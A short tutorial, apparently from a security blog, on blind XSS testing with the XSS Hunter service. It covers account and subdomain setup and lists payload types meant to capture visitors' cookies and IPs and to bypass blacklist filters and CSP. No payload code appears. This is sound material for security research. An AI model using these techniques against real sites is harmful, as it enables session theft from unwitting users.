Blind XSS using XSS Hunter
What is XSS Hunter?
XSS Hunter is a free service provided by @IAmMandatory with the aim of making it easier for researchers to find XSS vulnerabilities that are unreachable by researchers. This XSS hunter works by scanning vulnerable pages to get sensitive information such as User IP, User Cookies, URL of vulnerable Applications and getting screenshots of those pages.
How to make payload in XSS Hunter?
You only need to create an account at xsshunter.com, then you will be asked to create a subdomain of the xss.ht extension.
If you have created an account and have created a subdomain, you just have to open the payloads page, then there are many payloads that have been provided such as
- <script> Tag Payload - Basic XSS payload
- <input> Tag Payload - For bypassing poorly designed blacklist systems with the HTML5 autofocus attribute.
- <img> Tag Payload - Another basic payload for when <script> tags are explicitly filtered.
- <video><source> Tag Payload - HTML5 payload, only works in Firefox, Chrome and Opera
- <iframe srcdoc= Tag Payload - HTML5 payload, only works in Firefox, Chrome and Opera
- XMLHTTPRequest Payload - For exploitation of web applications with Content Security Policies containing script-src but have unsafe-inline enabled.
- $.getScript() Payload - Example payload for sites that include JQuery.